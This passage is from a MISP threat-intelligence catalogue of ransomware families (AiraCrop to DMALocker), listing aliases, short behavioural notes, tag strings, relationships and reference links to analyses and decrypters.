http://www.bleepingcomputer.com/forums/t/614025/8lock8-help-support-topic-8lock8-read-ittxt/

AiraCrop

Ransomware related to TeamXRat

The tag is: misp-galaxy:ransomware="AiraCrop"

Table 5458. Table References
Links
https://twitter.com/PolarToffee/status/796079699478900736

Al-Namrood

Ransomware

The tag is: misp-galaxy:ransomware="Al-Namrood"

Table 5459. Table References
Links
https://decrypter.emsisoft.com/al-namrood

ALFA Ransomware

Ransomware Made by creators of Cerber

The tag is: misp-galaxy:ransomware="ALFA Ransomware"

Table 5460. Table References
Links
http://www.bleepingcomputer.com/news/security/new-alfa-or-alpha-ransomware-from-the-same-devs-as-cerber/
https://news.softpedia.com/news/cerber-devs-create-new-ransomware-called-alfa-506165.shtml

Alma Ransomware

Ransomware

The tag is: misp-galaxy:ransomware="Alma Ransomware"

Alma Ransomware is also known as:

Alma Locker

Table 5461. Table References
Links
https://cta-service-cms2.hubspot.com/ctas/v2/public/cs/c/?cta_guid=d4173312-989b-4721-ad00-8308fff353b3&placement_guid=22f2fe97-c748-4d6a-9e1e-ba3fb1060abe&portal_id=326665&redirect_url=APefjpGnqFjmP_xzeUZ1Y55ovglY1y1ch7CgMDLit5GTHcW9N0ztpnIE-ZReqqv8MDj687_4Joou7Cd2rSx8-De8uhFQAD_Len9QpT7Xvu8neW5drkdtTPV7hAaou0osAi2O61dizFXibewmpO60UUCd5OazCGz1V6yT_3UFMgL0x9S1VeOvoL_ucuER8g2H3f1EfbtYBw5QFWeUmrjk-9dGzOGspyn303k9XagBtF3SSX4YWSyuEs03Vq7Fxb04KkyKc4GJx-igK98Qta8iMafUam8ikg8XKPkob0FK6Pe-wRZ0QVWIIkM&hsutk=34612af1cd87864cf7162095872571d1&utm_referrer=https%3A%2F%2Finfo.phishlabs.com%2Fblog%2Falma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter&canon=https%3A%2F%2Finfo.phishlabs.com%2Fblog%2Falma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter&;hstc=61627571.34612af1cd87864cf7162095872571d1.1472135921345.1472140656779.1472593507113.3&hssc=61627571.1.1472593507113&hsfp=1114323283[https://cta-service-cms2.hubspot.com/ctas/v2/public/cs/c/?cta_guid=d4173312-989b-4721-ad00-8308fff353b3&placement_guid=22f2fe97-c748-4d6a-9e1e-ba3fb1060abe&portal_id=326665&redirect_url=APefjpGnqFjmP_xzeUZ1Y55ovglY1y1ch7CgMDLit5GTHcW9N0ztpnIE-ZReqqv8MDj687_4Joou7Cd2rSx8-De8uhFQAD_Len9QpT7Xvu8neW5drkdtTPV7hAaou0osAi2O61dizFXibewmpO60UUCd5OazCGz1V6yT_3UFMgL0x9S1VeOvoL_ucuER8g2H3f1EfbtYBw5QFWeUmrjk-9dGzOGspyn303k9XagBtF3SSX4YWSyuEs03Vq7Fxb04KkyKc4GJx-igK98Qta8iMafUam8ikg8XKPkob0FK6Pe-wRZ0QVWIIkM&hsutk=34612af1cd87864cf7162095872571d1&utm_referrer=https%3A%2F%2Finfo.phishlabs.com%2Fblog%2Falma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter&canon=https%3A%2F%2Finfo.phishlabs.com%2Fblog%2Falma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter&;hstc=61627571.34612af1cd87864cf7162095872571d1.1472135921345.1472140656779.1472593507113.3&hssc=61627571.1.1472593507113&hsfp=1114323283]
https://info.phishlabs.com/blog/alma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter
http://www.bleepingcomputer.com/news/security/new-alma-locker-ransomware-being-distributed-via-the-rig-exploit-kit/

Alpha Ransomware

Ransomware

The tag is: misp-galaxy:ransomware="Alpha Ransomware"

Alpha Ransomware is also known as:

AlphaLocker

View relationships graph

Alpha Ransomware has relationships with:

similar: misp-galaxy:malpedia="AlphaLocker" with estimative-language:likelihood-probability="likely"

Table 5462. Table References
Links
http://download.bleepingcomputer.com/demonslay335/AlphaDecrypter.zip
http://www.bleepingcomputer.com/news/security/decrypted-alpha-ransomware-continues-the-trend-of-accepting-amazon-cards/
https://twitter.com/malwarebread/status/804714048499621888

AMBA

Ransomware Websites only amba@riseup.net

The tag is: misp-galaxy:ransomware="AMBA"

Table 5463. Table References
Links
https://twitter.com/benkow_/status/747813034006020096
https://www.enigmasoftware.com/ambaransomware-removal/

AngleWare

Ransomware

The tag is: misp-galaxy:ransomware="AngleWare"

Table 5464. Table References
Links
https://twitter.com/BleepinComputer/status/844531418474708993

Anony

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Anony"

Anony is also known as:

ngocanh

Table 5465. Table References
Links
https://twitter.com/struppigel/status/842047409446387714

Apocalypse

Ransomware decryptionservice@mail.ru recoveryhelp@bk.ru ransomware.attack@list.ru esmeraldaencryption@mail.ru dr.compress@bk.ru

The tag is: misp-galaxy:ransomware="Apocalypse"

Apocalypse is also known as:

Fabiansomeware

View relationships graph

Apocalypse has relationships with:

similar: misp-galaxy:rat="Apocalypse" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Apocalypse" with estimative-language:likelihood-probability="likely"

Table 5466. Table References
Links
https://decrypter.emsisoft.com/apocalypse
http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/

ApocalypseVM

Ransomware Apocalypse ransomware version which uses VMprotect

The tag is: misp-galaxy:ransomware="ApocalypseVM"

Table 5467. Table References
Links
http://decrypter.emsisoft.com/download/apocalypsevm

AutoLocky

Ransomware

The tag is: misp-galaxy:ransomware="AutoLocky"

Table 5468. Table References
Links
https://decrypter.emsisoft.com/autolocky

Aw3s0m3Sc0t7

Ransomware

The tag is: misp-galaxy:ransomware="Aw3s0m3Sc0t7"

Table 5469. Table References
Links
https://twitter.com/struppigel/status/828902907668000770

BadBlock

Ransomware

The tag is: misp-galaxy:ransomware="BadBlock"

Table 5470. Table References
Links
https://decrypter.emsisoft.com/badblock
http://www.nyxbone.com/malware/BadBlock.html
http://www.nyxbone.com/images/articulos/malware/badblock/5.png

BaksoCrypt

Ransomware Based on my-Little-Ransomware

The tag is: misp-galaxy:ransomware="BaksoCrypt"

Table 5471. Table References
Links
https://twitter.com/JakubKroustek/status/760482299007922176
https://0xc1r3ng.wordpress.com/2016/06/24/bakso-crypt-simple-ransomware/

Bandarchor

Ransomware Files might be partially encrypted

The tag is: misp-galaxy:ransomware="Bandarchor"

Bandarchor is also known as:

Rakhni

View relationships graph

Bandarchor has relationships with:

similar: misp-galaxy:ransomware="Rakhni" with estimative-language:likelihood-probability="likely"

Table 5472. Table References
Links
https://reaqta.com/2016/03/bandarchor-ransomware-still-active/
https://www.bleepingcomputer.com/news/security/new-bandarchor-ransomware-variant-spreads-via-malvertising-on-adult-sites/

Bart

Ransomware Possible affiliations with RockLoader, Locky and Dridex

The tag is: misp-galaxy:ransomware="Bart"

Bart is also known as:

BaCrypt

View relationships graph

Bart has relationships with:

similar: misp-galaxy:malpedia="Bart" with estimative-language:likelihood-probability="likely"

Table 5473. Table References
Links
http://now.avg.com/barts-shenanigans-are-no-match-for-avg/
http://phishme.com/rockloader-downloading-new-ransomware-bart/
https://www.proofpoint.com/us/threat-insight/post/New-Bart-Ransomware-from-Threat-Actors-Spreading-Dridex-and-Locky

BitCryptor

Ransomware Has a GUI. CryptoGraphic Locker family. Newer CoinVault variant.

The tag is: misp-galaxy:ransomware="BitCryptor"

Table 5474. Table References
Links
https://noransom.kaspersky.com/
https://id-ransomware.blogspot.com/2016/05/bitcryptor-ransomware-aes-256-1-btc.html

BitStak

Ransomware

The tag is: misp-galaxy:ransomware="BitStak"

Table 5475. Table References
Links
https://download.bleepingcomputer.com/demonslay335/BitStakDecrypter.zip
https://id-ransomware.blogspot.com/2016/07/ransomware-007867.html

BlackShades Crypter

Ransomware

The tag is: misp-galaxy:ransomware="BlackShades Crypter"

BlackShades Crypter is also known as:

SilentShade
BlackShades

Table 5476. Table References
Links
http://nyxbone.com/malware/BlackShades.html
https://id-ransomware.blogspot.com/2016/06/silentshade-ransomware-blackshades.html

Blocatto

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Blocatto"

Table 5477. Table References
Links
http://www.bleepingcomputer.com/forums/t/614456/bloccato-ransomware-bloccato-help-support-leggi-questo-filetxt/

Booyah

Ransomware EXE was replaced to neutralize threat

The tag is: misp-galaxy:ransomware="Booyah"

Booyah is also known as:

Salami

View relationships graph

Booyah has relationships with:

similar: misp-galaxy:ransomware="MM Locker" with estimative-language:likelihood-probability="likely"

Brazilian

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="Brazilian"

Table 5478. Table References
Links
http://www.nyxbone.com/malware/brazilianRansom.html
http://www.nyxbone.com/images/articulos/malware/brazilianRansom/0.png

Brazilian Globe

Ransomware

The tag is: misp-galaxy:ransomware="Brazilian Globe"

Table 5479. Table References
Links
https://twitter.com/JakubKroustek/status/821831437884211201

BrLock

Ransomware

The tag is: misp-galaxy:ransomware="BrLock"

Table 5480. Table References
Links
https://www.proofpoint.com/us/threat-insight/post/ransomware-explosion-continues-cryptflle2-brlock-mm-locker-discovered

Browlock

Ransomware no local encryption, browser only

The tag is: misp-galaxy:ransomware="Browlock"

BTCWare Related to / new version of CryptXXX

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare Related to / new version of CryptXXX"

Table 5481. Table References
Links
https://twitter.com/malwrhunterteam/status/845199679340011520

Bucbi

Ransomware no file name change, no extension

The tag is: misp-galaxy:ransomware="Bucbi"

Table 5482. Table References
Links
http://researchcenter.paloaltonetworks.com/2016/05/unit42-bucbi-ransomware-is-back-with-a-ukrainian-makeover/
https://id-ransomware.blogspot.com/2016/05/bucbi-ransomware.html

BuyUnlockCode

Ransomware Does not delete Shadow Copies

The tag is: misp-galaxy:ransomware="BuyUnlockCode"

Table 5483. Table References
Links
https://id-ransomware.blogspot.com/2016/05/buyunlockcode-ransomware-rsa-1024.html

Central Security Treatment Organization

Ransomware

The tag is: misp-galaxy:ransomware="Central Security Treatment Organization"

View relationships graph

Central Security Treatment Organization has relationships with:

similar: misp-galaxy:ransomware="CryLocker" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="CryLocker" with estimative-language:likelihood-probability="likely"

Table 5484. Table References
Links
http://www.bleepingcomputer.com/forums/t/625820/central-security-treatment-organization-ransomware-help-topic-cry-extension/
https://id-ransomware.blogspot.com/2016/09/cry-ransomware.html

Cerber

Ransomware

The tag is: misp-galaxy:ransomware="Cerber"

Cerber is also known as:

CRBR ENCRYPTOR

View relationships graph

Cerber has relationships with:

similar: misp-galaxy:malpedia="Cerber" with estimative-language:likelihood-probability="likely"

Table 5485. Table References
Links
https://blog.malwarebytes.org/threat-analysis/2016/03/cerber-ransomware-new-but-mature/
https://community.rsa.com/community/products/netwitness/blog/2016/11/04/the-evolution-of-cerber-v410
https://www.bleepingcomputer.com/news/security/cerber-renames-itself-as-crbr-encryptor-to-be-a-pita/

Chimera

Ransomware

The tag is: misp-galaxy:ransomware="Chimera"

Chimera is also known as:

Quimera Crypter
Pashka

Table 5486. Table References
Links
http://www.bleepingcomputer.com/news/security/chimera-ransomware-decryption-keys-released-by-petya-devs/
https://blog.malwarebytes.org/threat-analysis/2015/12/inside-chimera-ransomware-the-first-doxingware-in-wild/

Clock

Ransomware Does not encrypt anything

The tag is: misp-galaxy:ransomware="Clock"

Table 5487. Table References
Links
https://twitter.com/JakubKroustek/status/794956809866018816

CoinVault

Ransomware CryptoGraphic Locker family. Has a GUI. Do not confuse with CrypVault!

The tag is: misp-galaxy:ransomware="CoinVault"

Table 5488. Table References
Links
https://noransom.kaspersky.com/
https://id-ransomware.blogspot.com/2016/05/bitcryptor-ransomware-aes-256-1-btc.html

Coverton

Ransomware

The tag is: misp-galaxy:ransomware="Coverton"

Table 5489. Table References
Links
http://www.bleepingcomputer.com/news/security/paying-the-coverton-ransomware-may-not-get-your-data-back/
https://id-ransomware.blogspot.com/2016/04/coverton-ransomware.html

Cryaki

Ransomware

The tag is: misp-galaxy:ransomware="Cryaki"

Table 5490. Table References
Links
https://support.kaspersky.com/viruses/disinfection/8547

Crybola

Ransomware

The tag is: misp-galaxy:ransomware="Crybola"

Table 5491. Table References
Links
https://support.kaspersky.com/viruses/disinfection/8547

CryFile

Ransomware

The tag is: misp-galaxy:ransomware="CryFile"

Table 5492. Table References
Links
SHTODELATVAM.txt[SHTODELATVAM.txt]
Instructionaga.txt[Instructionaga.txt]
https://id-ransomware.blogspot.com/2016/06/cryfile-ransomware-100.html

CryLocker

Ransomware Identifies victim locations w/Google Maps API

The tag is: misp-galaxy:ransomware="CryLocker"

CryLocker is also known as:

Cry
CSTO
Central Security Treatment Organization

View relationships graph

CryLocker has relationships with:

similar: misp-galaxy:ransomware="Central Security Treatment Organization" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="CryLocker" with estimative-language:likelihood-probability="likely"

Table 5493. Table References
Links
http://www.bleepingcomputer.com/news/security/the-crylocker-ransomware-communicates-using-udp-and-stores-data-on-imgur-com/
https://id-ransomware.blogspot.com/2016/09/cry-ransomware.html

CrypMIC

Ransomware CryptXXX clone/spinoff

The tag is: misp-galaxy:ransomware="CrypMIC"

Table 5494. Table References
Links
http://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/
https://id-ransomware.blogspot.com/2016/07/crypmic-ransomware-aes-256.html

Crypren

Ransomware

The tag is: misp-galaxy:ransomware="Crypren"

Table 5495. Table References
Links
https://github.com/pekeinfo/DecryptCrypren
http://www.nyxbone.com/malware/Crypren.html
http://www.nyxbone.com/images/articulos/malware/crypren/0.png

Crypt38

Ransomware

The tag is: misp-galaxy:ransomware="Crypt38"

Table 5496. Table References
Links
https://download.bleepingcomputer.com/demonslay335/Crypt38Keygen.zip
https://blog.fortinet.com/2016/06/17/buggy-russian-ransomware-inadvertently-allows-free-decryption
https://id-ransomware.blogspot.com/2016/06/regist-crypt38-ransomware-aes-1000-15.html

Crypter

Ransomware Does not actually encrypt the files, but simply renames them

The tag is: misp-galaxy:ransomware="Crypter"

Table 5497. Table References
Links
https://twitter.com/jiriatvirlab/status/802554159564062722

CryptFIle2

Ransomware

The tag is: misp-galaxy:ransomware="CryptFIle2"

CryptFIle2 is also known as:

Lesli

Table 5498. Table References
Links
https://www.proofpoint.com/us/threat-insight/post/ransomware-explosion-continues-cryptflle2-brlock-mm-locker-discovered
https://id-ransomware.blogspot.com/2016/06/cryptfile2-ransomware-rsa-email.html

CryptInfinite

Ransomware

The tag is: misp-galaxy:ransomware="CryptInfinite"

CryptInfinite is also known as:

DecryptorMax

Table 5499. Table References
Links
https://decrypter.emsisoft.com/
https://id-ransomware.blogspot.com/2016/06/cryptfile2-ransomware-rsa-email.html

CryptoBit

Ransomware sekretzbel0ngt0us.KEY - do not confuse with CryptorBit.

The tag is: misp-galaxy:ransomware="CryptoBit"

View relationships graph

CryptoBit has relationships with:

similar: misp-galaxy:ransomware="Mobef" with estimative-language:likelihood-probability="likely"

Table 5500. Table References
Links
http://www.pandasecurity.com/mediacenter/panda-security/cryptobit/
http://news.softpedia.com/news/new-cryptobit-ransomware-could-be-decryptable-503239.shtml
https://id-ransomware.blogspot.com/2016/04/cryptobit-ransomware.html

CryptoDefense

Ransomware no extension change

The tag is: misp-galaxy:ransomware="CryptoDefense"

Table 5501. Table References
Links
https://decrypter.emsisoft.com/
https://id-ransomware.blogspot.com/2016/04/cryptodefense-ransomware.html

CryptoFinancial

Ransomware

The tag is: misp-galaxy:ransomware="CryptoFinancial"

CryptoFinancial is also known as:

Ranscam

View relationships graph

CryptoFinancial has relationships with:

similar: misp-galaxy:malpedia="Ranscam" with estimative-language:likelihood-probability="likely"

Table 5502. Table References
Links
http://blog.talosintel.com/2016/07/ranscam.html
https://nakedsecurity.sophos.com/2016/07/13/ransomware-that-demands-money-and-gives-you-back-nothing/
https://id-ransomware.blogspot.com/search?q=CryptoFinancial

CryptoFortress

Ransomware Mimics Torrentlocker. Encrypts only 50% of each file up to 5 MB

The tag is: misp-galaxy:ransomware="CryptoFortress"

View relationships graph

CryptoFortress has relationships with:

similar: misp-galaxy:ransomware="TorrentLocker" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="CryptoFortress" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="TorrentLocker" with estimative-language:likelihood-probability="likely"

Table 5503. Table References
Links
https://id-ransomware.blogspot.com/2016/05/cryptofortress-ransomware-aes-256-1.html

CryptoGraphic Locker

Ransomware Has a GUI. Subvariants: CoinVault BitCryptor

The tag is: misp-galaxy:ransomware="CryptoGraphic Locker"

CryptoHost

Ransomware RAR’s victim’s files has a GUI

The tag is: misp-galaxy:ransomware="CryptoHost"

CryptoHost is also known as:

Manamecrypt
Telograph
ROI Locker

View relationships graph

CryptoHost has relationships with:

similar: misp-galaxy:malpedia="ManameCrypt" with estimative-language:likelihood-probability="likely"

Table 5504. Table References
Links
http://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/
https://id-ransomware.blogspot.com/2016/04/cryptohost-ransomware.html

CryptoJoker

Ransomware

The tag is: misp-galaxy:ransomware="CryptoJoker"

View relationships graph

CryptoJoker has relationships with:

similar: misp-galaxy:ransomware="CryptoNar" with estimative-language:likelihood-probability="likely"

Table 5505. Table References
Links
https://id-ransomware.blogspot.com/2017/07/cryptojoker-2017-ransomware.html

CryptoLocker

Ransomware no longer relevant

The tag is: misp-galaxy:ransomware="CryptoLocker"

View relationships graph

CryptoLocker has relationships with:

similar: misp-galaxy:malpedia="CryptoLocker" with estimative-language:likelihood-probability="likely"

Table 5506. Table References
Links
https://www.fireeye.com/blog/executive-perspective/2014/08/your-locker-of-information-for-cryptolocker-decryption.html
https://reaqta.com/2016/04/uncovering-ransomware-distribution-operation-part-2/

CryptoLocker 1.0.0

Ransomware

The tag is: misp-galaxy:ransomware="CryptoLocker 1.0.0"

Table 5507. Table References
Links
https://twitter.com/malwrhunterteam/status/839747940122001408

CryptoLocker 5.1

Ransomware

The tag is: misp-galaxy:ransomware="CryptoLocker 5.1"

Table 5508. Table References
Links
https://twitter.com/malwrhunterteam/status/782890104947867649

CryptoMix

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix"

CryptoMix is also known as:

Zeta

View relationships graph

CryptoMix has relationships with:

similar: misp-galaxy:malpedia="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

Table 5509. Table References
Links
http://www.nyxbone.com/malware/CryptoMix.html
https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/
https://twitter.com/JakubKroustek/status/804009831518572544
https://www.bleepingcomputer.com/news/security/new-empty-cryptomix-ransomware-variant-released/
https://www.bleepingcomputer.com/news/security/0000-cryptomix-ransomware-variant-released/
https://www.bleepingcomputer.com/news/security/xzzx-cryptomix-ransomware-variant-released/
https://www.bleepingcomputer.com/news/security/test-cryptomix-ransomware-variant-released/
https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/
https://www.bleepingcomputer.com/news/security/system-cryptomix-ransomware-variant-released/
https://www.bleepingcomputer.com/news/security/mole66-cryptomix-ransomware-variant-released/
https://www.bleepingcomputer.com/news/security/new-backup-cryptomix-ransomware-variant-actively-infecting-users/
https://twitter.com/demonslay335/status/1072227523755470848
https://www.coveware.com/blog/cryptomix-ransomware-exploits-cancer-crowdfunding
https://www.bleepingcomputer.com/news/security/cryptomix-ransomware-exploits-sick-children-to-coerce-payments/

CryptoRansomeware

Ransomware

The tag is: misp-galaxy:ransomware="CryptoRansomeware"

View relationships graph

CryptoRansomeware has relationships with:

similar: misp-galaxy:malpedia="CryptoRansomeware" with estimative-language:likelihood-probability="likely"

Table 5510. Table References
Links
https://twitter.com/malwrhunterteam/status/817672617658347521

CryptoRoger

Ransomware

The tag is: misp-galaxy:ransomware="CryptoRoger"

Table 5511. Table References
Links
http://www.bleepingcomputer.com/news/security/new-ransomware-called-cryptoroger-that-appends-crptrgr-to-encrypted-files/
https://id-ransomware.blogspot.com/2016/06/cryptoroger-aes-256-0.html

CryptoShadow

Ransomware

The tag is: misp-galaxy:ransomware="CryptoShadow"

Table 5512. Table References
Links
https://twitter.com/struppigel/status/821992610164277248

CryptoShocker

Ransomware

The tag is: misp-galaxy:ransomware="CryptoShocker"

Table 5513. Table References
Links
http://www.bleepingcomputer.com/forums/t/617601/cryptoshocker-ransomware-help-and-support-topic-locked-attentionurl/
https://id-ransomware.blogspot.com/2016/06/cryptoshocker-ransomware-aes-200.html

CryptoTorLocker2015

Ransomware

The tag is: misp-galaxy:ransomware="CryptoTorLocker2015"

Table 5514. Table References
Links
http://www.bleepingcomputer.com/forums/t/565020/new-cryptotorlocker2015-ransomware-discovered-and-easily-decrypted/
https://id-ransomware.blogspot.com/2016/04/cryptotorlocker-ransomware.html

CryptoTrooper

Ransomware

The tag is: misp-galaxy:ransomware="CryptoTrooper"

Table 5515. Table References
Links
http://news.softpedia.com/news/new-open-source-linux-ransomware-shows-infosec-community-divide-508669.shtml

CryptoWall 1

Ransomware, Infection by Phishing

The tag is: misp-galaxy:ransomware="CryptoWall 1"

CryptoWall 2

Ransomware

The tag is: misp-galaxy:ransomware="CryptoWall 2"

CryptoWall 3

Ransomware

The tag is: misp-galaxy:ransomware="CryptoWall 3"

Table 5516. Table References
Links
https://blogs.technet.microsoft.com/mmpc/2015/01/13/crowti-update-cryptowall-3-0/
https://www.virustotal.com/en/file/45317968759d3e37282ceb75149f627d648534c5b4685f6da3966d8f6fca662d/analysis/

CryptoWall 4

Ransomware

The tag is: misp-galaxy:ransomware="CryptoWall 4"

CryptXXX

Ransomware Comes with Bedep

The tag is: misp-galaxy:ransomware="CryptXXX"

CryptXXX is also known as:

CryptProjectXXX

View relationships graph

CryptXXX has relationships with:

similar: misp-galaxy:ransomware="CryptXXX 2.0" with estimative-language:likelihood-probability="likely"

Table 5517. Table References
Links
https://support.kaspersky.com/viruses/disinfection/8547
http://www.bleepingcomputer.com/virus-removal/cryptxxx-ransomware-help-information
https://id-ransomware.blogspot.com/2016/04/cryptxxx-ransomware.html

CryptXXX 2.0

Ransomware Locks screen. Ransom note names are an ID. Comes with Bedep.

The tag is: misp-galaxy:ransomware="CryptXXX 2.0"

CryptXXX 2.0 is also known as:

CryptProjectXXX

View relationships graph

CryptXXX 2.0 has relationships with:

similar: misp-galaxy:ransomware="CryptXXX" with estimative-language:likelihood-probability="likely"

Table 5518. Table References
Links
https://support.kaspersky.com/viruses/disinfection/8547
https://www.proofpoint.com/us/threat-insight/post/cryptxxx2-ransomware-authors-strike-back-against-free-decryption-tool
http://blogs.cisco.com/security/cryptxxx-technical-deep-dive
https://id-ransomware.blogspot.com/2016/04/cryptxxx-ransomware.html

CryptXXX 3.0

Ransomware Comes with Bedep

The tag is: misp-galaxy:ransomware="CryptXXX 3.0"

CryptXXX 3.0 is also known as:

UltraDeCrypter
UltraCrypter

Table 5519. Table References
Links
https://support.kaspersky.com/viruses/disinfection/8547
http://www.bleepingcomputer.com/news/security/cryptxxx-updated-to-version-3-0-decryptors-no-longer-work/
http://blogs.cisco.com/security/cryptxxx-technical-deep-dive
https://id-ransomware.blogspot.com/2016/04/cryptxxx-ransomware.html

CryptXXX 3.1

Ransomware StilerX credential stealing

The tag is: misp-galaxy:ransomware="CryptXXX 3.1"

Table 5520. Table References
Links
https://support.kaspersky.com/viruses/disinfection/8547
https://www.proofpoint.com/us/threat-insight/post/cryptxxx-ransomware-learns-samba-other-new-tricks-with-version3100
https://id-ransomware.blogspot.com/2016/04/cryptxxx-ransomware.html

CryPy

Ransomware

The tag is: misp-galaxy:ransomware="CryPy"

Table 5521. Table References
Links
http://www.bleepingcomputer.com/news/security/ctb-faker-ransomware-does-a-poor-job-imitating-ctb-locker/
https://id-ransomware.blogspot.com/2016/09/crypy-ransomware.html

CTB-Faker

Ransomware

The tag is: misp-galaxy:ransomware="CTB-Faker"

CTB-Faker is also known as:

Citroni

Table 5522. Table References
Links
https://id-ransomware.blogspot.com/2016/07/ctb-faker-ransomware-008.html

CTB-Locker WEB

Ransomware websites only

The tag is: misp-galaxy:ransomware="CTB-Locker WEB"

Table 5523. Table References
Links
https://thisissecurity.net/2016/02/26/a-lockpicking-exercise/
https://github.com/eyecatchup/Critroni-php
https://id-ransomware.blogspot.com/2016/06/ctb-locker-for-websites-04.html

CuteRansomware

Ransomware Based on my-Little-Ransomware

The tag is: misp-galaxy:ransomware="CuteRansomware"

CuteRansomware is also known as:

my-Little-Ransomware

Table 5524. Table References
Links
https://github.com/aaaddress1/my-Little-Ransomware/tree/master/decryptoTool
https://github.com/aaaddress1/my-Little-Ransomware

Cyber SpLiTTer Vbs

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Cyber SpLiTTer Vbs"

Cyber SpLiTTer Vbs is also known as:

CyberSplitter

View relationships graph

Cyber SpLiTTer Vbs has relationships with:

similar: misp-galaxy:malpedia="CyberSplitter" with estimative-language:likelihood-probability="likely"

Table 5525. Table References
Links
https://twitter.com/struppigel/status/778871886616862720
https://twitter.com/struppigel/status/806758133720698881
https://id-ransomware.blogspot.com/2016/09/cyber-splitter-vbs-ransomware.html

Death Bitches

Ransomware

The tag is: misp-galaxy:ransomware="Death Bitches"

Table 5526. Table References
Links
https://twitter.com/JaromirHorejsi/status/815555258478981121

DeCrypt Protect

Ransomware

The tag is: misp-galaxy:ransomware="DeCrypt Protect"

Table 5527. Table References
Links
http://www.malwareremovalguides.info/decrypt-files-with-decrypt_mblblock-exe-decrypt-protect/

DEDCryptor

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="DEDCryptor"

Table 5528. Table References
Links
http://www.bleepingcomputer.com/forums/t/617395/dedcryptor-ded-help-support-topic/
http://www.nyxbone.com/malware/DEDCryptor.html
https://id-ransomware.blogspot.com/2016/06/dedcryptor-ransomware-aes-256rsa-2.html

Demo

Ransomware only encrypts .jpg files

The tag is: misp-galaxy:ransomware="Demo"

Demo is also known as:

CryptoDemo

Table 5529. Table References
Links
https://twitter.com/struppigel/status/798573300779745281
https://id-ransomware.blogspot.com/2017/10/cryptodemo-ransomware.html

DetoxCrypto

Ransomware - Based on Detox: Calipso, We are all Pokemons, Nullbyte

The tag is: misp-galaxy:ransomware="DetoxCrypto"

Table 5530. Table References
Links
http://www.bleepingcomputer.com/news/security/new-detoxcrypto-ransomware-pretends-to-be-pokemongo-or-uploads-a-picture-of-your-screen/
https://id-ransomware.blogspot.com/2016/08/detoxcrypto-ransomware.html

Digisom

Ransomware

The tag is: misp-galaxy:ransomware="Digisom"

Table 5531. Table References
Links
https://twitter.com/PolarToffee/status/829727052316160000

DirtyDecrypt

Ransomware

The tag is: misp-galaxy:ransomware="DirtyDecrypt"

Table 5532. Table References
Links
https://twitter.com/demonslay335/status/752586334527709184
https://id-ransomware.blogspot.com/2016/07/revoyem-dirtydecrypt-ransomware-doc.html

DMALocker

Ransomware no extension change Encrypted files have prefix: Version 1: ABCXYZ11 - Version 2: !DMALOCK - Version 3: !DMALOCK3.0 - Version 4: !DMALOCK4.0

The tag is: misp-galaxy:ransomware="DMALocker"

Table 5533. Table References
Links
https://decrypter.emsisoft.com/
https://github.com/hasherezade/dma_unlocker
